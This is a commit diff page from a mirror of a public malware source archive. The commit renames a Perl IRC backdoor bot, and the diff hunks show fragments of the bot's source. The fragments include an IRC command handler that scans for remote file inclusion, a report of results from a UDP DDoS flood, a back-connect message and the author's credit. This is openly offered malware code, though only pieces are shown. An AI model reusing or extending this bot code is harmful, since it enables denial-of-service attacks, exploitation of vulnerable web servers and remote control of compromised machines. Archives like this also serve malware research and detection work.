mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
Rename Backdoor.Perl.Shellbot.aa to Backdoor.Perl.IRCBot.Scanner.v
This commit is contained in:
parent
d372ccc7e1
commit
ba591fe207
@ -280,7 +280,7 @@ sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[BackConnect]\003\002: Conne
|
|||||||
#SCANNER
|
#SCANNER
|
||||||
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
|
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
|
||||||
$boturl=$2;
|
$boturl=$2;
|
||||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 » Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds.");
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 » Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds.");
|
||||||
srand;
|
srand;
|
||||||
my $itime = time;
|
my $itime = time;
|
||||||
my ($cur_time);
|
my ($cur_time);
|
||||||
@ -341,7 +341,7 @@ else {
|
|||||||
$bytes{o} = $2 * $pacotes{o};
|
$bytes{o} = $2 * $pacotes{o};
|
||||||
$bytes{udp} = $2 * $pacotes{udp};
|
$bytes{udp} = $2 * $pacotes{udp};
|
||||||
$bytes{tcp} = $2 * $pacotes{tcp};
|
$bytes{tcp} = $2 * $pacotes{tcp};
|
||||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Média ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1.".");
|
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Média ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1.".");
|
||||||
}
|
}
|
||||||
exit;
|
exit;
|
||||||
}
|
}
|
||||||
@ -608,4 +608,4 @@ close($sock);
|
|||||||
# www.morganxpl.com
|
# www.morganxpl.com
|
||||||
# morgan.rx@gmail.com
|
# morgan.rx@gmail.com
|
||||||
|
|
||||||
# NOTE: DONT REMOVE COPYRIGHTS
|
# NOTE: DONT REMOVE COPYRIGHTS
|
Loading…
Reference in New Issue
Block a user